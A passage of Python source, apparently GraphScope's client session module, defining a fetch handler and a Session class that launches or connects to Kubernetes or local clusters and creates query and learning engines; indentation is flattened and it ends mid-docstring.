DEFAULT_CONFIG_FILE = os.environ.get(
"GS_CONFIG_PATH", os.path.expanduser("~/.graphscope/session.json")
)
_session_dict = {}
logger = logging.getLogger("graphscope")
class _FetchHandler(object):
"""Handler for structured fetches.
This class takes care of extracting a sub-DAG as targets for a user-provided structure for fetches,
which can be used for a low level `run` call of grpc_client.
Given the results of the low level run call, this class can also rebuild a result structure
matching the user-provided structure for fetches, but containing the corresponding results.
"""
def __init__(self, dag, fetches):
self._fetches = fetches
self._ops = list()
self._unpack = False
if not isinstance(self._fetches, (list, tuple)):
self._fetches = [self._fetches]
self._unpack = True
for fetch in self._fetches:
if hasattr(fetch, "op"):
fetch = fetch.op
if not isinstance(fetch, Operation):
raise ValueError("Expect a `Operation` in sess run method.")
self._ops.append(fetch)
# extract sub dag
self._sub_dag = dag.extract_subdag_for(self._ops)
if "debug" in os.environ:
logger.info("sub_dag: %s", self._sub_dag)
@property
def targets(self):
return self._sub_dag
def _rebuild_graph(self, seq, op: Operation, op_result: op_def_pb2.OpResult):
if isinstance(self._fetches[seq], Operation):
# for nx Graph
return op_result.graph_def
# get graph dag node as base
graph_dag_node = self._fetches[seq]
# construct graph
g = Graph(graph_dag_node)
# update graph flied from graph_def
g.update_from_graph_def(op_result.graph_def)
return g
def _rebuild_learning_graph(
self, seq, op: Operation, op_result: op_def_pb2.OpResult
):
from graphscope.learning.graph import Graph as LearningGraph
handle = op_result.handle
handle = json.loads(base64.b64decode(handle).decode("utf-8"))
config = op_result.config.decode("utf-8")
handle["server"] = op_result.result.decode("utf-8")
handle["client_count"] = 1
graph_dag_node = self._fetches[seq]
# construct learning graph
g = LearningGraph(
graph_dag_node, handle, config, op_result.extra_info.decode("utf-8")
)
return g
def _rebuild_interactive_query(
self, seq, op: Operation, op_result: op_def_pb2.OpResult
):
# get interactive query dag node as base
interactive_query_node = self._fetches[seq]
# construct interactive query
interactive_query = InteractiveQuery(
interactive_query_node,
op_result.result.decode("utf-8"),
op_result.extra_info.decode("utf-8"),
)
interactive_query.status = InteractiveQueryStatus.Running
return interactive_query
def _rebuild_app(self, seq, op: Operation, op_result: op_def_pb2.OpResult):
from graphscope.framework.app import App
# get app dag node as base
app_dag_node = self._fetches[seq]
# construct app
app = App(app_dag_node, op_result.result.decode("utf-8"))
return app
def _rebuild_context(self, seq, op: Operation, op_result: op_def_pb2.OpResult):
from graphscope.framework.context import Context
from graphscope.framework.context import DynamicVertexDataContext
# get context dag node as base
context_dag_node = self._fetches[seq]
ret = json.loads(op_result.result.decode("utf-8"))
context_type = ret["context_type"]
if context_type == "dynamic_vertex_data":
# for nx
return DynamicVertexDataContext(context_dag_node, ret["context_key"])
else:
return Context(context_dag_node, ret["context_key"], ret["context_schema"])
def _rebuild_gremlin_results(
self, seq, op: Operation, op_result: op_def_pb2.OpResult
):
from graphscope.interactive.query import ResultSet
# get result set node as base
result_set_dag_node = self._fetches[seq]
return ResultSet(result_set_dag_node)
def wrap_results(self, response: message_pb2.RunStepResponse):
rets = list()
for seq, op in enumerate(self._ops):
for op_result in response.results:
if op.key == op_result.key:
if op.output_types == types_pb2.RESULTS:
if op.type == types_pb2.RUN_APP:
rets.append(self._rebuild_context(seq, op, op_result))
elif op.type == types_pb2.FETCH_GREMLIN_RESULT:
rets.append(pickle.loads(op_result.result))
else:
# for nx Graph
rets.append(op_result.result.decode("utf-8"))
if op.output_types == types_pb2.GREMLIN_RESULTS:
rets.append(self._rebuild_gremlin_results(seq, op, op_result))
if op.output_types == types_pb2.GRAPH:
rets.append(self._rebuild_graph(seq, op, op_result))
if op.output_types == types_pb2.LEARNING_GRAPH:
rets.append(self._rebuild_learning_graph(seq, op, op_result))
if op.output_types == types_pb2.APP:
rets.append(None)
if op.output_types == types_pb2.BOUND_APP:
rets.append(self._rebuild_app(seq, op, op_result))
if op.output_types in (
types_pb2.VINEYARD_TENSOR,
types_pb2.VINEYARD_DATAFRAME,
):
rets.append(
json.loads(op_result.result.decode("utf-8"))["object_id"]
)
if op.output_types in (types_pb2.TENSOR, types_pb2.DATAFRAME):
if (
op.type == types_pb2.CONTEXT_TO_DATAFRAME
or op.type == types_pb2.GRAPH_TO_DATAFRAME
):
rets.append(decode_dataframe(op_result.result))
if (
op.type == types_pb2.CONTEXT_TO_NUMPY
or op.type == types_pb2.GRAPH_TO_NUMPY
):
rets.append(decode_numpy(op_result.result))
if op.output_types == types_pb2.INTERACTIVE_QUERY:
rets.append(self._rebuild_interactive_query(seq, op, op_result))
if op.output_types == types_pb2.NULL_OUTPUT:
rets.append(None)
break
return rets[0] if self._unpack else rets
def get_dag_for_unload(self):
"""Unload operations (graph, app, context) in dag which are not
existed in fetches.
"""
unload_dag = op_def_pb2.DagDef()
keys_of_fetches = set([op.key for op in self._ops])
mapping = {
types_pb2.CREATE_GRAPH: types_pb2.UNLOAD_GRAPH,
types_pb2.CREATE_APP: types_pb2.UNLOAD_APP,
types_pb2.RUN_APP: types_pb2.UNLOAD_CONTEXT,
}
for op_def in self._sub_dag.op:
if op_def.op in mapping and op_def.key not in keys_of_fetches:
unload_op_def = op_def_pb2.OpDef(
op=mapping[op_def.op], key=uuid.uuid4().hex
)
unload_op_def.parents.extend([op_def.key])
unload_dag.op.extend([unload_op_def])
return unload_dag
class Session(object):
"""A class for interacting with GraphScope graph computation service cluster.
A :class:`Session` object encapsulates the environment in which :class:`Operation`
objects are executed/evaluated.
A session may own resources. It is important to release these resources when
they are no longer required. To do this, invoke the :meth:`close` method
on the session.
A Session can register itself as default session with :meth:`as_default`, and all operations
after that will use the default session. Session deregister itself as a default session
when closed.
The following example demonstrates its usage:
.. code:: python
>>> import graphscope as gs
>>> # use session object explicitly
>>> sess = gs.session()
>>> g = sess.g()
>>> pg = g.project(vertices={'v': []}, edges={'e': ['dist']})
>>> r = gs.sssp(g, 4)
>>> sess.close()
>>> # or use a session as default
>>> sess = gs.session().as_default()
>>> g = gs.g()
>>> pg = g.project(vertices={'v': []}, edges={'e': ['dist']})
>>> r = gs.sssp(pg, 4)
>>> sess.close()
We support setup a service cluster and create a RPC session in following ways:
- GraphScope graph computation service run in cluster managed by kubernetes.
>>> s = graphscope.session()
Also, :class:`Session` provides several keyword params for users to define the cluster.
You may use the param :code:`k8s_gs_image` to specify the image for all engine pod, and
param :code:`k8s_engine_cpu` or :code:`k8s_engine_mem` to specify the resources. More,
you can find all params detail in :meth:`__init__` method.
>>> s = graphscope.session(
... k8s_gs_image="registry.cn-hongkong.aliyuncs.com/graphscope/graphscope:latest",
... k8s_vineyard_cpu=0.1,
... k8s_vineyard_mem="256Mi",
... vineyard_shared_mem="4Gi",
... k8s_engine_cpu=0.1,
... k8s_engine_mem="256Mi")
- or all params can be provided by a json configuration file or configuration dict.
>>> s = graphscope.session(config='/tmp/config.json')
>>> # Or
>>> s = graphscope.session(config={'k8s_engine_cpu': 5, 'k8s_engine_mem': '5Gi'})
"""
@set_defaults(gs_config)
def __init__(
self,
config=None,
addr=gs_config.addr,
mode=gs_config.mode,
cluster_type=gs_config.cluster_type,
num_workers=gs_config.num_workers,
preemptive=gs_config.preemptive,
k8s_namespace=gs_config.k8s_namespace,
k8s_service_type=gs_config.k8s_service_type,
k8s_gs_image=gs_config.k8s_gs_image,
k8s_etcd_image=gs_config.k8s_etcd_image,
k8s_image_pull_policy=gs_config.k8s_image_pull_policy,
k8s_image_pull_secrets=gs_config.k8s_image_pull_secrets,
k8s_coordinator_cpu=gs_config.k8s_coordinator_cpu,
k8s_coordinator_mem=gs_config.k8s_coordinator_mem,
k8s_etcd_num_pods=gs_config.k8s_etcd_num_pods,
k8s_etcd_cpu=gs_config.k8s_etcd_cpu,
k8s_etcd_mem=gs_config.k8s_etcd_mem,
k8s_vineyard_daemonset=gs_config.k8s_vineyard_daemonset,
k8s_vineyard_cpu=gs_config.k8s_vineyard_cpu,
k8s_vineyard_mem=gs_config.k8s_vineyard_mem,
vineyard_shared_mem=gs_config.vineyard_shared_mem,
k8s_engine_cpu=gs_config.k8s_engine_cpu,
k8s_engine_mem=gs_config.k8s_engine_mem,
k8s_mars_worker_cpu=gs_config.mars_worker_cpu,
k8s_mars_worker_mem=gs_config.mars_worker_mem,
k8s_mars_scheduler_cpu=gs_config.mars_scheduler_cpu,
k8s_mars_scheduler_mem=gs_config.mars_scheduler_mem,
k8s_volumes=gs_config.k8s_volumes,
k8s_waiting_for_delete=gs_config.k8s_waiting_for_delete,
timeout_seconds=gs_config.timeout_seconds,
dangling_timeout_seconds=gs_config.dangling_timeout_seconds,
with_mars=gs_config.with_mars,
enable_gaia=gs_config.enable_gaia,
reconnect=False,
**kw,
):
"""Construct a new GraphScope session.
Args:
config (dict or str, optional): The configuration dict or file about how to launch the GraphScope instance.
For str, it will identify it as a path and read the configuration file to build a
session if file exist. If not specified, the global default configuration
:code:`DEFAULT_CONFIG_FILE` will be used, which get value of GS_CONFIG_PATH
in environment. Note that it will overwrite explicit parameters. Defaults to None.
addr (str, optional): The endpoint of a pre-launched GraphScope instance with '<ip>:<port>' format.
A new session id will be generated for each session connection.
mode (str, optional): optional values are eager and lazy. Defaults to eager.
Eager execution is a flexible platform for research and experimentation, it provides:
An intuitive interface: Quickly test on small data.
Easier debugging: Call ops directly to inspect running models and test changes.
Lazy execution means GraphScope does not process the data till it has to. It just gathers all the
information to a DAG that we feed into it, and processes only when we execute :code:`sess.run(fetches)`
cluster_type (str, optional): Deploy GraphScope instance on hosts or k8s cluster. Defaults to k8s.
Available options: "k8s" and "hosts". Note that only support deployed on localhost with hosts mode.
num_workers (int, optional): The number of workers to launch GraphScope engine. Defaults to 2.
preemptive (bool, optional): If True, GraphScope instance will treat resource params (e.g. k8s_coordinator_cpu)
as limits and provide the minimum available value as requests, but this will make pod has a `Burstable` QOS,
which can be preempted by other pods with high QOS. Otherwise, it will set both requests and limits with the
same value.
k8s_namespace (str, optional): Contains the namespace to create all resource inside.
If param missing, it will try to read namespace from kubernetes context, or
a random namespace will be created and deleted if namespace not exist.
Defaults to None.
k8s_service_type (str, optional): Type determines how the GraphScope service is exposed.
Valid options are NodePort, and LoadBalancer. Defaults to NodePort.
k8s_gs_image (str, optional): The GraphScope engine's image.
k8s_etcd_image (str, optional): The image of etcd, which used by vineyard.
k8s_image_pull_policy (str, optional): Kubernetes image pull policy. Defaults to "IfNotPresent".
k8s_image_pull_secrets (list[str], optional): A list of secret name used to authorize pull image.
k8s_vineyard_daemonset (str, optional): The name of vineyard Helm deployment to use. GraphScope will try to
discovery the daemonset from kubernetes cluster, then use it if exists, and fallback to launching
a bundled vineyard container otherwise.
k8s_vineyard_cpu (float, optional): Minimum number of CPU cores request for vineyard container. Defaults to 0.5.
k8s_vineyard_mem (str, optional): Minimum number of memory request for vineyard container. Defaults to '512Mi'.
vineyard_shared_mem (str, optional): Init size of vineyard shared memory. Defaults to '4Gi'.
k8s_engine_cpu (float, optional): Minimum number of CPU cores request for engine container. Defaults to 0.5.
k8s_engine_mem (str, optional): Minimum number of memory request for engine container. Defaults to '4Gi'.
k8s_coordinator_cpu (float, optional): Minimum number of CPU cores request for coordinator pod. Defaults to 1.0.
k8s_coordinator_mem (str, optional): Minimum number of memory request for coordinator pod. Defaults to '4Gi'.
k8s_etcd_num_pods (int, optional): The number of etcd pods. Defaults to 3.
k8s_etcd_cpu (float, optional): Minimum number of CPU cores request for etcd pod. Defaults to 0.5.
k8s_etcd_mem (str, optional): Minimum number of memory request for etcd pod. Defaults to '128Mi'.
k8s_mars_worker_cpu (float, optional):
Minimum number of CPU cores request for mars worker container. Defaults to 0.5.
k8s_mars_worker_mem (str, optional):
Minimum number of memory request for mars worker container. Defaults to '4Gi'.
k8s_mars_scheduler_cpu (float, optional):
Minimum number of CPU cores request for mars scheduler container. Defaults to 0.5.
k8s_mars_scheduler_mem (str, optional):
Minimum number of memory request for mars scheduler container. Defaults to '2Gi'.
with_mars (bool, optional):
Launch graphscope with mars. Defaults to False.
enable_gaia (bool, optional):
Launch graphscope with gaia enabled. Defaults to False.
k8s_volumes (dict, optional): A dict of k8s volume which represents a directory containing data, accessible to the
containers in a pod. Defaults to {}.
For example, you can mount host path with:
k8s_volumes = {
"my-data": {
"type": "hostPath",
"field": {
"path": "<path>",
"type": "Directory"
},
"mounts": [
{
"mountPath": "<path1>"
},
{
"mountPath": "<path2>"
}
]
}
}
Or you can mount PVC with:
k8s_volumes = {
"my-data": {
"type": "persistentVolumeClaim",
"field": {
"claimName": "your-pvc-name"
},
"mounts": [
{
"mountPath": "<path1>"
}
]
}
}
Also, you can mount a single volume with:
k8s_volumes = {
"my-data": {
"type": "hostPath",
"field": {xxx},
"mounts": {
"mountPath": "<path1>"
}
}
}
timeout_seconds (int, optional): For waiting service ready (or waiting for delete if
k8s_waiting_for_delete is True).
dangling_timeout_seconds (int, optional): After seconds of client disconnect,
coordinator will kill this graphscope instance. Defaults to 600.
Expect this value to be greater than 5 (heartbeat interval).
Disable dangling check by setting -1.
k8s_waiting_for_delete (bool, optional): Waiting for service delete or not. Defaults to False.
**kw (dict, optional): Other optional parameters will be put to :code:`**kw`.
- k8s_minikube_vm_driver: Deprecated.
- k8s_client_config (dict, optional):
Provide configurable parameters for connecting to remote k8s,
which strongly relies on the `kube_config.new_client_from_config` function.
eg: {"config_file": "~/.kube/config", "context": None, "persist_config": True}
config_file: Name of the kube-config file.
context: set the active context. If is set to None, current_context from config file will be used.
persist_config: If True, config file will be updated when changed(e.g GCP token refresh).
- log_level: Deprecated.
Move this param as a global configuration. Set via `graphscope.set_option(log_level='DEBUG')`
- show_log: Deprecated.
Move this param as a global configuration.Set via `graphscope.set_option(show_log=True)`
- k8s_vineyard_shared_mem: Deprecated.
Please use vineyard_shared_mem instead.
reconnect (bool, optional): When connecting to a pre-launched GraphScope cluster with :code:`addr`,
the connect request would be rejected with there is still an existing session connected. There
are cases where the session still exists and user's client has lost connection with the backend,
e.g., in a jupyter notebook. We have a :code:`dangling_timeout_seconds` for it, but a more
deterministic behavior would be better.
If :code:`reconnect` is True, the existing session will be reused. It is the user's responsibility
to ensure there's no such an active client actually.
Defaults to :code:`False`.
- k8s_gie_graph_manager_image: Deprecated.
- k8s_gie_graph_manager_cpu: Deprecated.
- k8s_gie_graph_manager_mem: Deprecated.
- k8s_zookeeper_image: Deprecated.
- k8s_zookeeper_cpu: Deprecated.
- k8s_zookeeper_mem: Deprecated.
Raises:
TypeError: If the given argument combination is invalid and cannot be used to create
a GraphScope session.
"""
self._config_params = {}
self._accessable_params = (
"addr",
"mode",
"cluster_type",
"num_workers",
"preemptive",
"k8s_namespace",
"k8s_service_type",
"k8s_gs_image",
"k8s_etcd_image",
"k8s_image_pull_policy",
"k8s_image_pull_secrets",
"k8s_coordinator_cpu",
"k8s_coordinator_mem",
"k8s_etcd_num_pods",
"k8s_etcd_cpu",
"k8s_etcd_mem",
"k8s_vineyard_daemonset",
"k8s_vineyard_cpu",
"k8s_vineyard_mem",
"vineyard_shared_mem",
"k8s_engine_cpu",
"k8s_engine_mem",
"k8s_mars_worker_cpu",
"k8s_mars_worker_mem",
"k8s_mars_scheduler_cpu",
"k8s_mars_scheduler_mem",
"with_mars",
"enable_gaia",
"reconnect",
"k8s_volumes",
"k8s_waiting_for_delete",
"timeout_seconds",
"dangling_timeout_seconds",
)
self._deprecated_params = (
"show_log",
"log_level",
"k8s_vineyard_shared_mem",
"k8s_gie_graph_manager_image",
"k8s_gie_graph_manager_cpu",
"k8s_gie_graph_manager_mem",
"k8s_zookeeper_image",
"k8s_zookeeper_cpu",
"k8s_zookeeper_mem",
)
saved_locals = locals()
for param in self._accessable_params:
self._config_params[param] = saved_locals[param]
# parse config, which should be a path to config file, or dict
# config has highest priority
if isinstance(config, dict):
self._config_params.update(config)
elif isinstance(config, str):
self._load_config(config, slient=False)
elif DEFAULT_CONFIG_FILE:
self._load_config(DEFAULT_CONFIG_FILE)
# update other optional params
self._config_params.update(kw)
# initial setting of cluster_type
self._cluster_type = self._parse_cluster_type()
# initial dag
self._dag = Dag()
# mars cannot work with run-on-local mode
if self._cluster_type == types_pb2.HOSTS and self._config_params["with_mars"]:
raise NotImplementedError(
"Mars cluster cannot be launched along with local GraphScope deployment"
)
# deprecated params handle
for param in self._deprecated_params:
if param in kw:
warnings.warn(
"The `{0}` parameter has been deprecated and has no effect.".format(
param
),
category=DeprecationWarning,
)
if param == "show_log" or param == "log_level":
warnings.warn(
"Please use `graphscope.set_option({0}={1})` instead".format(
param, kw.pop(param, None)
),
category=DeprecationWarning,
)
if param == "k8s_vineyard_shared_mem":
warnings.warn(
"Please use 'vineyard_shared_mem' instead",
category=DeprecationWarning,
)
kw.pop(param, None)
# update k8s_client_config params
self._config_params["k8s_client_config"] = kw.pop("k8s_client_config", {})
# There should be no more custom keyword arguments.
if kw:
raise ValueError("Value not recognized: ", list(kw.keys()))
if self._config_params["addr"]:
logger.info(
"Connecting graphscope session with address: %s",
self._config_params["addr"],
)
else:
logger.info(
"Initializing graphscope session with parameters: %s",
self._config_params,
)
self._closed = False
# coordinator service endpoint
self._coordinator_endpoint = None
self._launcher = None
self._heartbeat_sending_thread = None
self._grpc_client = None
self._session_id = None # unique identifier across sessions
# engine config:
#
# {
# "experiment": "ON/OFF",
# "vineyard_socket": "...",
# "vineyard_rpc_endpoint": "..."
# }
self._engine_config = None
# interactive instance related graph map
self._interactive_instance_dict = {}
# learning engine related graph map
self._learning_instance_dict = {}
self._default_session = None
atexit.register(self.close)
# create and connect session
with CaptureKeyboardInterrupt(self.close):
self._connect()
self._disconnected = False
# heartbeat
self._heartbeat_interval_seconds = 5
self._heartbeat_sending_thread = threading.Thread(
target=self._send_heartbeat, args=()
)
self._heartbeat_sending_thread.daemon = True
self._heartbeat_sending_thread.start()
# networkx module
self._nx = None
def __repr__(self):
return str(self.info)
def __str__(self):
return repr(self)
@property
def session_id(self):
return self._session_id
@property
def dag(self):
return self._dag
def _load_config(self, path, slient=True):
config_path = os.path.expandvars(os.path.expanduser(path))
try:
with open(config_path, "r") as f:
data = json.load(f)
self._config_params.update(data)
except Exception as exp: # noqa
if not slient:
raise exp
def _parse_cluster_type(self):
if self._config_params["addr"] is not None:
# get the cluster type after connecting
return types_pb2.UNDEFINED
else:
if self._config_params["cluster_type"] == "hosts":
self._run_on_local()
return types_pb2.HOSTS
elif self._config_params["cluster_type"] == "k8s":
return types_pb2.K8S
else:
raise ValueError("Expect hosts or k8s of cluster_type parameter")
@property
def engine_config(self):
"""Show the engine configration associated with session in json format."""
return self._engine_config
@property
def info(self):
"""Show all resources info associated with session in json format."""
info = {}
if self._closed:
info["status"] = "closed"
elif self._grpc_client is None or self._disconnected:
info["status"] = "disconnected"
else:
info["status"] = "active"
if self._cluster_type == types_pb2.K8S:
info["type"] = "k8s"
info["engine_hosts"] = ",".join(self._pod_name_list)
info["namespace"] = self._config_params["k8s_namespace"]
else:
info["type"] = "hosts"
info["engine_hosts"] = self._engine_config["engine_hosts"]
info["cluster_type"] = str(self._cluster_type)
info["session_id"] = self.session_id
info["num_workers"] = self._config_params["num_workers"]
info["coordinator_endpoint"] = self._coordinator_endpoint
info["engine_config"] = self._engine_config
return info
@property
def closed(self):
return self._closed
def eager(self):
return self._config_params["mode"] == "eager"
def _send_heartbeat(self):
while not self._closed:
if self._grpc_client:
try:
self._grpc_client.send_heartbeat()
except Exception as exc:
logger.warning(exc)
self._disconnected = True
else:
self._disconnected = False
time.sleep(self._heartbeat_interval_seconds)
def close(self):
"""Closes this session.
This method frees all resources associated with the session.
Note that closing will ignore SIGINT and SIGTERM signal and recover later.
"""
with SignalIgnore([signal.SIGINT, signal.SIGTERM]):
self._close()
def _close(self):
if self._closed:
return
time.sleep(5)
self._closed = True
self._coordinator_endpoint = None
self._deregister_default()
if self._heartbeat_sending_thread:
self._heartbeat_sending_thread.join(
timeout=self._heartbeat_interval_seconds
)
self._heartbeat_sending_thread = None
self._disconnected = True
# close all interactive instances
for instance in self._interactive_instance_dict.values():
try:
if instance is not None:
instance.close()
except Exception:
pass
self._interactive_instance_dict.clear()
# close all learning instances
for instance in self._learning_instance_dict.values():
try:
if instance is not None:
instance.close()
except Exception:
pass
self._learning_instance_dict.clear()
if self._grpc_client:
try:
self._grpc_client.close()
except Exception:
pass
self._grpc_client = None
_session_dict.pop(self._session_id, None)
# clean up
if self._config_params["addr"] is None:
try:
if self._launcher:
self._launcher.stop()
except Exception:
pass
self._pod_name_list = []
def _close_interactive_instance(self, instance):
"""Close a interactive instance."""
if self.eager():
self._interactive_instance_dict[instance.object_id] = None
def _close_learning_instance(self, instance):
"""Close a learning instance."""
if self.eager():
self._learning_instance_dict[instance.object_id] = None
def __del__(self):
# cleanly ignore all exceptions
try:
self.close()
except Exception: # pylint: disable=broad-except
pass
def _check_closed(self, msg=None):
"""Internal: raise a ValueError if session is closed"""
if self.closed:
raise ValueError(msg or "Operation on closed session.")
# Context manager
def __enter__(self):
"""Context management protocol.
Returns self and register self as default session.
"""
self._check_closed()
self.as_default()
return self
def __exit__(self, type, value, traceback):
"""Deregister self from the default session,
close the session and release the resources, ignore all exceptions in close().
"""
try:
self._deregister_default()
self.close()
except Exception:
pass
def as_default(self):
"""Obtain a context manager that make this object as default session.
This method is used when a Session is constructed, which will immediately
install self as a default session.
Raises:
ValueError: If default session exist in current context.
Returns:
A context manager using this session as the default session.
"""
if not _default_session_stack.is_cleared():
raise ValueError(
"A default session is already active. You must explicitly call Session.close()."
)
# session context manager
self._default_session = default_session(self)
self._default_session.__enter__()
def _deregister_default(self):
"""Remove self from the default session stack."""
if self._default_session:
self._default_session.__exit__(None, None, None)
self._default_session = None
def _wrapper(self, dag_node):
if self.eager():
return self.run(dag_node)
else:
return dag_node
def run(self, fetches, debug=False):
"""Run operations of `fetch`.
Args:
fetch: :class:`Operation`
Raises:
RuntimeError:
Client disconnect to the service. Or run on a closed session.
ValueError:
If fetch is not a instance of :class:`Operation`. Or
the fetch has been evaluated.
InvalidArgumentError:
Not recognized on output type.
Returns:
Different values for different output types of :class:`Operation`
"""
if self._closed:
raise RuntimeError("Attempted to use a closed Session.")
if not self._grpc_client:
raise RuntimeError("Session disconnected.")
fetch_handler = _FetchHandler(self.dag, fetches)
try:
response = self._grpc_client.run(fetch_handler.targets)
except FatalError:
self.close()
raise
if not self.eager():
# Unload operations that cannot be touched anymore
dag_to_unload = fetch_handler.get_dag_for_unload()
try:
self._grpc_client.run(dag_to_unload)
except FatalError:
self.close()
raise
return fetch_handler.wrap_results(response)
def _connect(self):
if self._config_params["addr"] is not None:
# try connect to exist coordinator
self._coordinator_endpoint = self._config_params["addr"]
elif self._cluster_type == types_pb2.K8S:
if (
self._config_params["k8s_etcd_image"] is None
or self._config_params["k8s_gs_image"] is None
):
raise K8sError("None image found.")
if isinstance(
self._config_params["k8s_client_config"],
kube_client.api_client.ApiClient,
):
api_client = self._config_params["k8s_client_config"]
else:
try:
api_client = kube_config.new_client_from_config(
**self._config_params["k8s_client_config"]
)
except kube_config.ConfigException as e:
raise RuntimeError(
"Kubernetes environment not found, you may want to"
' launch session locally with param cluster_type="hosts"'
) from e
self._launcher = KubernetesClusterLauncher(
api_client=api_client,
**self._config_params,
)
elif (
self._cluster_type == types_pb2.HOSTS
and isinstance(self._config_params["hosts"], list)
and len(self._config_params["hosts"]) != 0
and self._config_params["num_workers"] > 0
):
# lanuch coordinator with hosts
self._launcher = HostsClusterLauncher(
**self._config_params,
)
else:
raise RuntimeError(
f"Unrecognized cluster type {types_pb2.ClusterType.Name(self._cluster_type)}."
)
# launching graphscope service
if self._launcher is not None:
self._launcher.start()
self._coordinator_endpoint = self._launcher.coordinator_endpoint
# waiting service ready
self._grpc_client = GRPCClient(
self._launcher, self._coordinator_endpoint, self._config_params["reconnect"]
)
self._grpc_client.waiting_service_ready(
timeout_seconds=self._config_params["timeout_seconds"],
)
# connect and fetch logs from rpc server
try:
(
self._session_id,
self._cluster_type,
self._engine_config,
self._pod_name_list,
self._config_params["num_workers"],
self._config_params["k8s_namespace"],
) = self._grpc_client.connect(
cleanup_instance=not bool(self._config_params["addr"]),
dangling_timeout_seconds=self._config_params[
"dangling_timeout_seconds"
],
)
# fetch logs
if self._config_params["addr"] or self._cluster_type == types_pb2.K8S:
self._grpc_client.fetch_logs()
_session_dict[self._session_id] = self
except Exception:
self.close()
raise
def get_config(self):
"""Get configuration of the session."""
return self._config_params
def g(self, incoming_data=None, oid_type="int64", directed=True, generate_eid=True):
return self._wrapper(
GraphDAGNode(self, incoming_data, oid_type, directed, generate_eid)
)
def load_from(self, *args, **kwargs):
"""Load a graph within the session.
See more information in :meth:`graphscope.load_from`.
"""
with default_session(self):
return graphscope.load_from(*args, **kwargs)
def _run_on_local(self):
self._config_params["hosts"] = ["localhost"]
self._config_params["port"] = None
self._config_params["vineyard_socket"] = ""
@set_defaults(gs_config)
def gremlin(self, graph, engine_params=None):
"""Get a interactive engine handler to execute gremlin queries.
It will return a instance of :class:`graphscope.interactive.query.InteractiveQueryDAGNode`,
that will be evaluated by :method:`sess.run` in eager mode.
Note that this method will be executed implicitly in eager mode when a property graph created
and cache a instance of InteractiveQuery in session if `initializing_interactive_engine` is True.
If you want to create a new instance under the same graph by different params, you should close
the instance first.
.. code:: python
>>> # close and recreate InteractiveQuery in eager mode.
>>> interactive_query = sess.gremlin(g)
>>> interactive_query.close()
>>> interactive_query = sess.gremlin(g, engine_params={"xxx":"xxx"})
Args:
graph (:class:`graphscope.framework.graph.GraphDAGNode`):
The graph to create interactive instance.
engine_params (dict, optional): Configure startup parameters of interactive engine.
You can also configure this param by `graphscope.set_option(engine_params={})`.
See a list of configurable keys in
`interactive_engine/deploy/docker/dockerfile/executor.vineyard.properties`
Raises:
InvalidArgumentError:
- :code:`graph` is not a property graph.
- :code:`graph` is unloaded in eager mode.
Returns:
:class:`graphscope.interactive.query.InteractiveQueryDAGNode`:
InteractiveQuery to execute gremlin queries, evaluated in eager mode.
"""
if self._session_id != graph.session_id:
raise RuntimeError(
"Failed to create interactive engine on the graph with different session: {0} vs {1}".format(
self._session_id, graph.session_id
)
)
# Interactive query instance won't add to self._interactive_instance_dict in lazy mode.
# self._interactive_instance_dict[graph.vineyard_id] will be None if InteractiveQuery closed
if (
self.eager()
and graph.vineyard_id in self._interactive_instance_dict
and self._interactive_instance_dict[graph.vineyard_id] is not None
):
interactive_query = self._interactive_instance_dict[graph.vineyard_id]
if interactive_query.status == InteractiveQueryStatus.Running:
return interactive_query
elif interactive_query.status == InteractiveQueryStatus.Failed:
raise InteractiveEngineInternalError(interactive_query.error_msg)
else:
# Initializing.
# while True is ok, as the status is either running or failed eventually after timeout.
while True:
time.sleep(1)
if interactive_query.status == InteractiveQueryStatus.Running:
return interactive_query
elif interactive_query.status == InteractiveQueryStatus.Failed:
raise InteractiveEngineInternalError(
interactive_query.error_msg
)
if not graph.graph_type == graph_def_pb2.ARROW_PROPERTY:
raise InvalidArgumentError("The graph should be a property graph.")
if self.eager():
if not graph.loaded():
raise InvalidArgumentError("The graph has already been unloaded")
# cache the instance of interactive query in eager mode
interactive_query = InteractiveQuery()
self._interactive_instance_dict[graph.vineyard_id] = interactive_query
try:
enable_gaia = self._config_params["enable_gaia"]
_wrapper = self._wrapper(
InteractiveQueryDAGNode(self, graph, engine_params, enable_gaia)
)
except Exception as e:
if self.eager():
interactive_query.status = InteractiveQueryStatus.Failed
interactive_query.error_msg = str(e)
raise InteractiveEngineInternalError(str(e)) from e
else:
if self.eager():
interactive_query = _wrapper
graph._attach_interactive_instance(interactive_query)
return _wrapper
def learning(self, graph, nodes=None, edges=None, gen_labels=None):
"""Start a graph learning engine.
Note that this method has been deprecated, using `graphlearn` replace.
"""
warnings.warn(
"The method 'learning' has been deprecated, using graphlearn replace."
)
return self.graphlearn(graph, nodes, edges, gen_labels)
def graphlearn(self, graph, nodes=None, edges=None, gen_labels=None):
"""Start a graph learning engine.
Args:
nodes (list): The node types that will be used for gnn training.
edges (list): The edge types that will be used for gnn training.
gen_labels (list): Extra node and edge labels on original graph for gnn training.
Returns:
:class:`graphscope.learning.GraphDAGNode`:
An instance of learning graph that could be feed to the learning engine, evaluated in eager node.
"""
if self._session_id != graph.session_id:
raise RuntimeError(
"Failed to create learning engine on the graph with different session: {0} vs {1}".format(
self._session_id, graph.session_id
)
)
if (
self.eager()
and graph.vineyard_id in self._learning_instance_dict
and self._learning_instance_dict[graph.vineyard_id] is not None
):
return self._learning_instance_dict[graph.vineyard_id]
if not graph.graph_type == graph_def_pb2.ARROW_PROPERTY:
raise InvalidArgumentError("The graph should be a property graph.")
if self.eager():
if not graph.loaded():
raise InvalidArgumentError("The graph has already been unloaded")
from graphscope.learning.graph import GraphDAGNode as LearningGraphDAGNode
_wrapper = self._wrapper(
LearningGraphDAGNode(self, graph, nodes, edges, gen_labels)
)
if self.eager():
self._learning_instance_dict[graph.vineyard_id] = _wrapper
graph._attach_learning_instance(_wrapper)
return _wrapper
def nx(self):
if not self.eager():
raise RuntimeError(
"Networkx module need the session to be eager mode. "
"Current session is lazy mode."
)
if self._nx:
return self._nx
import importlib.util
spec = importlib.util.find_spec("graphscope.nx")
mod = importlib.util.module_from_spec(spec)
spec.loader.exec_module(mod)
graph = type("Graph", (mod.Graph.__base__,), dict(mod.Graph.__dict__))
digraph = type("DiGraph", (mod.DiGraph.__base__,), dict(mod.DiGraph.__dict__))
setattr(graph, "_session", self)
setattr(digraph, "_session", self)
setattr(mod, "Graph", graph)
setattr(mod, "DiGraph", digraph)
self._nx = mod
return self._nx
session = Session
def set_option(**kwargs):
"""Set the value of specified options.
Find params detail in :class:`graphscope.Session`
Available options:
- num_workers
- log_level
- show_log
- vineyard_shared_mem
- k8s_namespace
- k8s_service_type
- k8s_gs_image
